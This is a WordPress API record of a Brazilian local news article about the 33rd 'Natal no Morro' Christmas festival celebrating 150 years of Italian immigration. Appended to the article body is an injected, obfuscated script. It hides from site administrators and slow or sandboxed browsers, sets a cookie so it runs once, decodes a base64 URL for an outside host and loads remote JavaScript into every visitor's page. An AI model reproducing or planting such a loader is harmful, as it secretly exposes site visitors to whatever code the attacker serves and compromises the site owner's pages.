{"id":3991,"date":"2025-12-13T17:13:34","date_gmt":"2025-12-13T17:13:34","guid":{"rendered":"https:\/\/www.jornalnotiserra.com.br\/?p=3991"},"modified":"2026-04-04T18:01:11","modified_gmt":"2026-04-04T18:01:11","slug":"um-espetaculo-de-tradicao-e-historia-33o-natal-no-morro-celebra-150-anos-da-imigracao-italiana","status":"publish","type":"post","link":"https:\/\/www.jornalnotiserra.com.br\/index.php\/2025\/12\/13\/um-espetaculo-de-tradicao-e-historia-33o-natal-no-morro-celebra-150-anos-da-imigracao-italiana\/","title":{"rendered":"Um Espet\u00e1culo de Tradi\u00e7\u00e3o e Hist\u00f3ria: 33\u00ba Natal no Morro Celebra 150 Anos da Imigra\u00e7\u00e3o Italiana"},"content":{"rendered":"<p>O munic\u00edpio se prepara para viver mais uma edi\u00e7\u00e3o do tradicional <strong>Natal no Morro<\/strong>, que chega ao seu 33\u00ba ano repleto de significado, mem\u00f3ria e emo\u00e7\u00e3o. Em 2025, o evento ganha um destaque especial ao homenagear os <strong>150 anos da Imigra\u00e7\u00e3o Italiana<\/strong>, celebrando a f\u00e9, a cultura e o legado deixado pelas fam\u00edlias que ajudaram a construir a identidade local.<\/p>\n<p>Com o tema central inspirado na trajet\u00f3ria dos imigrantes, o evento traz o espet\u00e1culo <strong>Auto de Natal \u201cA F\u00e9 que Atravessou o Mar\u201d<\/strong>, uma apresenta\u00e7\u00e3o que retrata a coragem, a espiritualidade e a esperan\u00e7a daqueles que cruzaram o oceano em busca de novas oportunidades. O espet\u00e1culo ser\u00e1 exibido em duas grandes noites, nos dias <strong>13 e 20 de dezembro<\/strong>, reunindo comunidade, visitantes e artistas locais em um cen\u00e1rio que combina tradi\u00e7\u00e3o religiosa, emo\u00e7\u00e3o e arte.<\/p>\n<p>A escolha do tema fortalece o v\u00ednculo entre o passado e o presente, resgatando hist\u00f3rias que marcaram gera\u00e7\u00f5es e valorizando a heran\u00e7a cultural italiana ainda t\u00e3o viva na regi\u00e3o.<\/p>\n<p>A programa\u00e7\u00e3o do 33\u00ba Natal no Morro iniciou oficialmente no dia <strong>6 de dezembro<\/strong>, com a abertura oficial e uma s\u00e9rie de atra\u00e7\u00f5es que se estendem at\u00e9 o dia <strong>21<\/strong>. Durante esse per\u00edodo, o Morro se transforma em um ponto de encontro para fam\u00edlias, visitantes e moradores que buscam vivenciar momentos de espiritualidade, confraterniza\u00e7\u00e3o e celebra\u00e7\u00e3o.<\/p>\n<p>Ao longo das semanas, o p\u00fablico poder\u00e1 acompanhar atividades culturais, apresenta\u00e7\u00f5es art\u00edsticas, decora\u00e7\u00e3o tem\u00e1tica, ilumina\u00e7\u00e3o especial, momentos de devo\u00e7\u00e3o e viv\u00eancias que resgatam tradi\u00e7\u00f5es natalinas. O clima de Natal toma conta do espa\u00e7o, criando uma atmosfera aconchegante e inspiradora.<\/p>\n<p>O Natal no Morro \u00e9 reconhecido por unir esfor\u00e7os de volunt\u00e1rios, grupos culturais, entidades religiosas, equipes municipais e moradores que se dedicam \u00e0 organiza\u00e7\u00e3o do evento. Essa soma de talentos e trabalho coletivo fortalece o sentimento de pertencimento e valoriza a participa\u00e7\u00e3o comunit\u00e1ria, um dos pilares da celebra\u00e7\u00e3o.<\/p>\n<p>Al\u00e9m do valor cultural e espiritual, a programa\u00e7\u00e3o movimenta o turismo local, recebendo visitantes de diversas regi\u00f5es que buscam vivenciar a experi\u00eancia \u00fanica proporcionada pelo espet\u00e1culo e pelo ambiente tradicional do Morro.<\/p>\n<p>Ao completar sua 33\u00aa edi\u00e7\u00e3o, o Natal no Morro reafirma sua import\u00e2ncia como parte do patrim\u00f4nio cultural do munic\u00edpio. A edi\u00e7\u00e3o dedicada aos 150 anos da Imigra\u00e7\u00e3o Italiana representa n\u00e3o apenas uma homenagem, mas tamb\u00e9m um reconhecimento da for\u00e7a, da f\u00e9 e da perseveran\u00e7a que marcaram a trajet\u00f3ria de centenas de fam\u00edlias.<\/p>\n<p>Com uma programa\u00e7\u00e3o diversificada e um espet\u00e1culo cuidadosamente preparado, o evento promete encantar o p\u00fablico, resgatar valores e fortalecer la\u00e7os de comunidade e hist\u00f3ria.<\/p>\n<p>O Natal no Morro chega mais uma vez para iluminar dezembro, unir pessoas e celebrar o esp\u00edrito natalino que atravessa gera\u00e7\u00f5es.<\/p>\n<p>&nbsp;<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>O munic\u00edpio se prepara para viver mais uma edi\u00e7\u00e3o do tradicional Natal no Morro, que chega ao seu 33\u00ba ano repleto de significado, mem\u00f3ria e emo\u00e7\u00e3o. Em 2025, o evento ganha um destaque especial ao homenagear os 150 anos da Imigra\u00e7\u00e3o Italiana, celebrando a f\u00e9, a cultura e o legado deixado pelas fam\u00edlias que ajudaram&#8230;<\/p>\n","protected":false},"author":7,"featured_media":3992,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[45],"tags":[],"_links":{"self":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3991"}],"collection":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=3991"}],"version-history":[{"count":1,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3991\/revisions"}],"predecessor-version":[{"id":3993,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3991\/revisions\/3993"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media\/3992"}],"wp:attachment":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=3991"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=3991"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=3991"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}